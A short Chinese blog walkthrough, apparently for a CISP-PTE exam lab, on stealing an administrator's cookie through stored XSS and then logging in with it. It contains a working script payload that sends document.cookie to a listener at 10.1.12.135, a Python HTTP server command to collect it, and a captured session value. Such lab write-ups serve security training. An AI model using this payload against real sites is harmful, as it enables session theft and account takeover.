banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

cisp-pte xss考题

Xss 内容主要的考点是在获取管理员的 cookie,然后伪造管理员的 cookie 进行登录。

界面如下

img

点击上图中的 Test 可进行留言

img

准备获取 cookie 的 xss payload

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

开启 web 服务,接收 cookie

Python -m SimpleHTTPServer 8889

img

将 payload 写入输入框

img

点击提交查询

等待

查看 python 是否接受到 cookie

img

将 cookie 复制下来

1acb0fb952b3caaf1ab7277511923138

img

将 cookie 值替换掉

img

点击 Edit 进行替换

img

刷新界面,点击 Admin

img

成功登录,获取到 key

wps10

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。